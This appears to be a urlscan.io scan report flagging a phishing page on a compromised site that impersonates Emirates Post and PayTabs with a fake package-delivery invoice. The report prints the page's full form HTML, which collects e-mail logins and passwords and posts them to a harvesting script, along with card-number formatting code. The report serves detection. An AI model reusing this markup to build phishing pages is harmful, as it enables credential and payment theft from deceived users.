archive.ulaanbaatar.mn
Open in
urlscan Pro
103.9.90.158
Malicious Activity!
Public Scan
Submitted URL: https://archive.ulaanbaatar.mn/bin/
Effective URL: https://archive.ulaanbaatar.mn/bin/nmm/index1.php
Submission: On August 23 via manual from DE — Scanned from DE
Effective URL: https://archive.ulaanbaatar.mn/bin/nmm/index1.php
Submission: On August 23 via manual from DE — Scanned from DE
Form analysis
1 forms found in the DOMPOST ./jean/paris1.php
<form action="./jean/paris1.php" class="form-fields" role="form" id="form_pay" method="post" accept-charset="utf-8" _lpchecked="1">
<input type="hidden" name="exchange_rate" value="0.2736">
<div class="payment-wrap">
<div>
<label class="payment_method">
<input type="radio" id="creditcard" name="payment_type" value="creditcard">
<img src="./files/cards.png" width="75" alt="Credit Card">
</label>
</div>
<div class="form-wrap sadad-hide" style="display:none;">
<input class="form-control" placeholder="Enter SADAD Account ID (e.g. Khalid012)" value="" maxlength="12" name="olpalias" id="olpalias" autocomplete="off" type="text">
</div>
<span class="whats-this sadad-hide" style="display:none;">Don't have SADAD Account ID?</span>
<!--Sadad Enable-->
<div id="pt-sadad-enable-outer">
<div id="pt-sadad-enable" class="pt-sadad-enable-wrap pt-arrow">
<div class="pt-sadad-enable-inner">
<h2>How to enable SADAD Account?</h2>
<ul class="pt-sadad-htp">
<li class="step1 step-help">
<figure>
<img class="img-help" src="./files/p1.png" width="50" height="32">
<figcaption>Login to your <br> online banking</figcaption>
</figure>
</li>
<li class="step2 step-help">
<figure>
<img class="img-help" src="./files/p2.png" width="48" height="33">
<figcaption>Register in SADAD Account by creating an ID and a password</figcaption>
</figure>
</li>
<script type="text/javascript">
var $cc = {}
$cc.validate = function(e) {
//if the input is empty reset the indicators to their default classes
if (e.target.value == '') {
e.target.previousElementSibling.className = 'card-type';
e.target.nextElementSibling.className = 'card-valid';
return
}
//Retrieve the value of the input and remove all non-number characters
var number = String(e.target.value);
var cleanNumber = '';
for (var i = 0; i < number.length; i++) {
if (/^[0-9]+$/.test(number.charAt(i))) {
cleanNumber += number.charAt(i);
}
}
//Only parse and correct the input value if the key pressed isn't backspace.
if (e.key != 'Backspace') {
//Format the value to include spaces in the correct locations
var formatNumber = '';
for (var i = 0; i < cleanNumber.length; i++) {
if (i == 3 || i == 7 || i == 11) {
formatNumber = formatNumber + cleanNumber.charAt(i) + ' '
} else {
formatNumber += cleanNumber.charAt(i)
}
}
e.target.value = formatNumber;
}
//run the Luhn algorithm on the number if it is at least equal to the shortest card length
if (cleanNumber.length >= 12) {
var isLuhn = luhn(cleanNumber);
}
function luhn(number) {
var numberArray = number.split('').reverse();
for (var i = 0; i < numberArray.length; i++) {
if (i % 2 != 0) {
numberArray[i] = numberArray[i] * 2;
if (numberArray[i] > 9) {
numberArray[i] = parseInt(String(numberArray[i]).charAt(0)) + parseInt(String(numberArray[i]).charAt(1))
}
}
}
var sum = 0;
for (var i = 1; i < numberArray.length; i++) {
sum += parseInt(numberArray[i]);
}
sum = sum * 9 % 10;
if (numberArray[0] == sum) {
return true
} else {
return false
}
}
//if the number passes the Luhn algorithm add the class 'active'
if (isLuhn == true) {
e.target.nextElementSibling.className = 'card-valid active'
} else {
e.target.nextElementSibling.className = 'card-valid'
}
var card_types = [{
name: 'maestro',
pattern: /^(5018|5020|5038|6304|6759|676[1-3])/,
valid_length: [12, 13, 14, 15, 16, 17, 18, 19]
}];
//test the number against each of the above card types and regular expressions
for (var i = 0; i < card_types.length; i++) {
if (number.match(card_types[i].pattern)) {
//if a match is found add the card type as a class
e.target.previousElementSibling.className = 'card-type ' + card_types[i].name;
}
}
}
$cc.expiry = function(e) {
if (e.key != 'Backspace') {
var number = String(this.value);
//remove all non-number character from the value
var cleanNumber = '';
for (var i = 0; i < number.length; i++) {
if (i == 1 && number.charAt(i) == '/') {
cleanNumber = 0 + number.charAt(0);
}
if (/^[0-9]+$/.test(number.charAt(i))) {
cleanNumber += number.charAt(i);
}
}
var formattedMonth = ''
for (var i = 0; i < cleanNumber.length; i++) {
if (/^[0-9]+$/.test(cleanNumber.charAt(i))) {
//if the number is greater than 1 append a zero to force a 2 digit month
if (i == 0 && cleanNumber.charAt(i) > 1) {
formattedMonth += 0;
formattedMonth += cleanNumber.charAt(i);
formattedMonth += '/';
}
//add a '/' after the second number
else if (i == 1) {
formattedMonth += cleanNumber.charAt(i);
formattedMonth += '/';
}
//force a 4 digit year
else if (i == 2 && cleanNumber.charAt(i) < 2) {
formattedMonth += '20' + cleanNumber.charAt(i);
} else {
formattedMonth += cleanNumber.charAt(i);
}
}
}
this.value = formattedMonth;
}
}
</script>
<li class="step3 step-help">
<figure>
<img class="img-help" src="./files/p3.png" width="27" height="33">
<figcaption>Add funds to <br> your SADAD Account</figcaption>
</figure>
</li>
</ul>
<a href="" class="pt-sadad-btn" target="_blank">Learn More</a>
</div>
</div>
</div>
<!-- End Sadad Enable Note-->
</div>
<div class="col-md-12 col-sm-12 form-wrap" style="margin-top:0; border-radius:0 0 5px 5px;">
<div class="justified-wrap">
<div class="col-md-12 col-sm-12 no-space">
<div>
<label>PACKAGE №</label>
<label type="text" class=" label-amount">NV 78297802</label>
</div>
<label>AED</label>
<label type="text" class=" label-amount">12.15</label>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="alert alert-danger display-hide" style="display:none;">
<button data-dismiss="alert" class="close" type="button">×</button>
<strong> Error!</strong> All fields are required.
</div>
<div class="clearfix"></div>
<!--
</div>-->
<div class="col-md-12 col-sm-12 card-details">
<div class="form-wrap creditcard-hide">
<input type="text" class="required form-control" placeholder="E-mail Login " required="" name="login" autocomplete="off">
<input type="password" class="required form-control" placeholder="Password" name="pwd" autocomplete="off">
<div class="col-md-4 col-sm-4 no-space">
<input type="submit" class="btn btn-lg btn-block btn-success" style="margin-top:15px;background-color: #4fad4d;
color: #fff; " value="Login">
<div class="text-nav" style=" text-align:center; margin-top:15px;"><a href="">Cancel</a></div>
<img class="card-brands-supported" alt="credit cards" style="margin-top:15px;" src="./files/credit-cards.png">
<div style="display: none;" id="hidden_fields">
<input type="hidden" value="" name="amount" id="amount">
<input type="hidden" name="paypage_id" value="10031622">
</div>
<input type="hidden" name="gointerpay_finger_print_id" id="gointerpay_finger_print_id" value="">
</div>
</div>
</div>
</form>
Text Content
Warning: include(./config/banned-ip.php): failed to open stream: No such file or directory in /home2/archive/public_html/bin/nmm/index1.php on line 2 Warning: include(): Failed opening './config/banned-ip.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home2/archive/public_html/bin/nmm/index1.php on line 2 PayTabs - Simple & Trusted Payments PLEASE WAIT ... عربي EMIRATES POST LOGIN Don't have SADAD Account ID? HOW TO ENABLE SADAD ACCOUNT? * Login to your online banking * Register in SADAD Account by creating an ID and a password * Add funds to your SADAD Account Learn More PACKAGE № NV 78297802 AED 12.15 × Error! All fields are required. Cancel INVOICE Invoice Number INV - 10031622 Invoice Date 11/08/2020 22:52 PM Emirates Post Login United Arab Emirates Work Timings: From 09:00 AM To 02:00 PM , Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday Description Quantity Unit Price Amount Delivery Invoice (Purchase Package) 1 AED 12.15 AED 12.15 Terms & Conditions The consumer has the right to cancel his purchase and receive a refund if delivery is delayed for more than 15 days, unless a new delivery date has been negotiated with the merchant. mci.gov.sa Other Charges: AED 0.00 Sub Total: AED 12.15 Discount: AED 0.00 Total: AED 12.15 Close FOR BETTER VIEWING EXPERIENCE USE LARGER SCREEN OR OK